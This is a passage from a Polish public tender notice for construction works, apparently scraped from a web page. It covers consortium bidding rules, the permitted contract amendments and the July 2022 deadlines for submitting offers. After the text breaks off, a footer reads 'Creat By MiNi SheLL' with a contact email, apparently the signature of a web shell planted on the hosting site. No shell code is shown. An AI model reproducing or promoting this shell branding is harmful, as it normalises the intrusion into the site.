zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (np. członkowie<br/>konsorcjum, wspólnicy spółki cywilnej), zgodnie z art. 58 ust. 2 ustawy, są zobowiązani<br/>ustanowić Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich<br/>w postępowaniu i do zawarcia umowy, i przedstawić stosowne dokumenty (pełnomocnictwa) w<br/>składanej ofercie.<br/>2. Ponadto Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego<br/>składają:<br/>2.1. każdy z osobna dotyczące ich dokumenty wskazane odpowiednio w pkt 6.1.5.1., a<br/>ponadto – na wezwanie Zamawiającego – także dokument opisany w pkt 6.2.1 SWZ dot.<br/>każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2.2. jeżeli dotyczy - dokumenty wskazane w pkt 6.1.3., 6.1.4., 6.1.5.1 dot. podmiotu<br/>udostępniającego zasoby, a ponadto – na wezwanie Zamawiającego – także 6.2.1. SWZ dot.<br/>podmiotu udostępniającego zasoby;<br/>2.3. dokumenty, o których mowa w pkt 6.1.1. i 6.1.2. SWZ (w tym dot. podmiotu<br/>udostępniającego zasoby – jeżeli dotyczy);<br/>2.4. ci z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, którzy spełniają<br/>warunek udziału w postępowaniu, a także ewentualnie podmioty udostępniające zasoby -<br/>dokumenty, o których mowa w pkt 6.1.5.2 SWZ;<br/>2.5. a na wezwanie Zamawiającego, ci z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, którzy spełniają warunek, na potwierdzenie którego wymagany jest dany dokument,<br/>także dokument wskazany w pkt 6.2.2. SWZ.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. członkowie konsorcjum)<br/>ponoszą, zgodnie z art. 445 ust. 1 ustawy, solidarną odpowiedzialność za wykonanie umowy i<br/>wniesienie zabezpieczenia należytego wykonania umowy – jeżeli dotyczy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wprowadzenie zmian treści umowy wymaga sporządzenia pod rygorem nieważności formy pisemnej aneksu, z zastrzeżeniem art. 455 ust. 1 ustawy Prawo zamówień publicznych.<br/>2.	Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień umowy w następujących przypadkach:<br/>1)	wysokości wynagrodzenia w przypadku: <br/>a.	zmiany stawki podatku VAT, w odniesieniu do tej części wynagrodzenia, której zmiana dotyczy, <br/>b.	ograniczenia zakresu prac objętych niniejszą Umową w razie stwierdzenia braku konieczności wykonywania części zamówienia, ujętych w dokumentacji i SWZ, <br/>c.	zmiany zakresu prac objętych niniejszą Umową w wyniku zmian opisanych w pkt. 3); <br/>2)	terminu realizacji przedmiotu zamówienia, zakresu świadczenia, sposobu realizacji umowy i wynagrodzenia gdy są one spowodowane: <br/>a.	siłą wyższą – rozumianą jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w części lub całości, a w szczególności epidemią COVID-19 stwierdzoną przez uprawnione do tego organy lokalne lub państwowe, klęską żywiołową, strajkiem lub stanem wyjątkowym, <br/>b.	zmiany zakresu prac objętych niniejszą umową w przypadku zastosowania zmian opisanych w pkt. 3), <br/>c.	następstwem okoliczności leżących po stronie Zamawiającego, takich jak: utrudnienia, zawieszenia robót lub przeszkodami dającymi się przypisać Zamawiającemu, <br/>d.	koniecznością wprowadzenia zmian do dokumentacji projektowej na etapie wykonawstwa robót z przyczyn niezależnych od obu stron, aktualizacją rozwiązań projektowych z uwagi na postęp technologiczny, <br/>e.	koniecznością wykonania robót dodatkowych wpływających na termin wykonania robót objętych niniejszą umową podstawową, <br/>f.	następstwem działania organów administracji lub innych podmiotów, związanych z przekroczeniem obowiązujących terminów wydawania lub odmowy wydania decyzji, zezwoleń, uzgodnień, <br/>g.	następstwem wprowadzania zmian w obowiązujących przepisach prawnych mających wpływ na realizację przedmiotu zamówienia, <br/>h.	wyjątkowo niekorzystne warunki atmosferyczne, długotrwałe deszcze, śnieg trwające pow. 7 dni lub mróz uniemożliwiający wykonanie robót zgodnie ze sztuką;<br/>3)	jakości lub innych parametrów materiałów, przy czym zmiana taka może być spowodowaną: <br/>a.	niedostępnością na rynku materiałów lub urządzeń wskazanych w dokumentacji <br/>projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych spowodowaną: <br/>i.	zaprzestaniem produkcji, <br/>ii.	udowodnionym, niezawinionym przez Wykonawcę dłuższym terminem ich dostawy na plac budowy, <br/>iii.	wycofaniem z rynku tych materiałów, <br/>b.	dostępnością na rynku materiałów lub technologii pozwalających na: <br/>i.	zaoszczędzenie kosztów lub czasu realizacji przedmiotu Umowy, <br/>ii.	obniżenie kosztów eksploatacji wykonanego przedmiotu Umowy, <br/>iii.	uzyskanie lepszej jakości robót, <br/>iv.	poprawę warunków bezpieczeństwa i eksploatacji w przyszłym obiekcie; <br/>c.	koniecznością zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych/technologicznych lub materiałowych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem albo wadliwym lub nieterminowym wykonaniem przedmiotu Umowy; <br/>d.	koniecznością zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych/technologicznych lub materiałowych ze względu na zmiany obowiązującego prawa; <br/>e.	koniecznością usunięcia sprzeczności w dokumentacji; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-11 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z wymaganymi załącznikami za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-11 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> c.d. informacji z pkt 3.6 ogłoszenia<br/>10.Za datę przekazania oferty, dokumentów, informacji i oświadczeń oraz ich cyfrowych<br/>odwzorowań przyjmuje się datę ich przekazania na ePUAP lub datę i godzinę serwera<br/>pocztowego Zamawiającego.<br/>11. Formaty danych wymagane do sporządzania i przekazywania dokumentów i informacji w<br/>postępowaniu określa § 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie. Zamawiający wskazuje jednak, że wśród<br/>dopuszczalnych i ogólnie dostępnych formatów znajdują się m.in.: .txt, .rtf, .pdf, .doc, .docx,<br/>.odt., ze szczególnym wskazaniem na .pdf.<br/>12. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej<br/>może zawsze dokonać notariusz. Ponadto szczegółowe zasady poświadczania różnych<br/>kategorii dokumentów opisuje § 6 ust. 3 oraz § 7 ust. 3 Rozporządzenia przywołanego w pkt 11<br/>powyżej.<br/>13. W Formularzu oferty wartości liczbowe należy wpisywać w każdej pozycji wyłącznie cyframi,<br/>a w miejscach gdzie jest to wyraźnie wskazane także słownie (nie stosuje się wyrażenia „jw.” i<br/>równoważnych).<br/>14. Podmiotowe środki dowodowe, przedmiotowe środki dowodowe oraz inne dokumenty lub<br/>oświadczenia, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język<br/>polski.<br/>15. Zamawiający zastrzega sobie ponadto możliwość żądania, aby w przypadku wskazania<br/>przez Wykonawcę dostępności podmiotowych środków dowodowych lub dokumentów, o których<br/>mowa w pkt 6.1.2. lit. a SWZ, pod określonymi adresami internetowymi ogólnodostępnych i<br/>bezpłatnych baz danych, przedstawił on tłumaczenia na język polski pobranych samodzielnie<br/>przez Zamawiającego podmiotowych środków dowodowych lub dokumentów.<br/>16. W zakresie nieuregulowanym ustawą lub niniejszą SWZ do podmiotowych środków<br/>dowodowych, oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu<br/>zastosowanie mają w szczególności przepisy rozporządzenia przywołanego w pkt 8.4. SWZ<br/>powyżej oraz rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w<br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich<br/>może żądać zamawiający od wykonawcy.<br/>c.d. pkt 7.4. ogłoszenia:<br/>f. zmianami rozwiązań technicznych/technologicznych lub materiałowych ujętych w<br/>dokumentacji projektowej, spowodowanymi koniecznością wprowadzenia modyfikacji<br/>dokumentacji projektowej podyktowanymi koniecznością racjonalizacji konkretnych rozwiązań<br/>zwiększających walory użytkowe obiektu, będącego przedmiotem umowy, o ile ta modyfikacja<br/>nie zmieni parametrów inwestycji;<br/>4) osób przewidzianych do realizacji zamówienia przez Strony pod warunkiem, że osoby<br/>zaproponowane będą posiadały co najmniej takie uprawnienia, które potwierdzają spełnienie<br/>warunku w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie<br/>zamówienia w zakresie osób.<br/>5) zmiana podwykonawcy, rezygnacja z podwykonawcy, jeżeli podwykonawca nie wykonuje prac z należytą starannością, uległ likwidacji, doszło do rozwiązania umowy łączącej go z<br/>Wykonawcą – z zachowaniem trybu postępowania opisanego w § 6 niniejszej Umowy.<br/>6) powierzenie określonego zakresu prac podwykonawcy lub zmiany zakresu części prac<br/>powierzonych podwykonawcy w przypadku gdy:<br/>i. konieczność powierzenia przez Wykonawcę prac podwykonawcy spowodowana jest<br/>rozwiązaniem umów o pracę z pracownikami wykonującymi pracę w danej branży w takiej<br/>liczbie, która uniemożliwia realizację prac przez Wykonawcę,<br/>ii. wprowadzenie nowego podwykonawcy zapewni lepszą realizację danej części zamówienia,<br/>iii. konieczność powierzenia prac podwykonawcy jest wynikiem zmiany technologii robót lub<br/>materiałów,<br/>iv. w przypadku opóźnień zapewni terminową realizację przedmiotu Umowy, z zastrzeżeniem<br/>trybu opisanego w § 6.<br/>7) zmiany zakresu Umowy spowodowanej następstwem działania organów administracji...

Creat By MiNi SheLL
Email: jattceo@gmail.com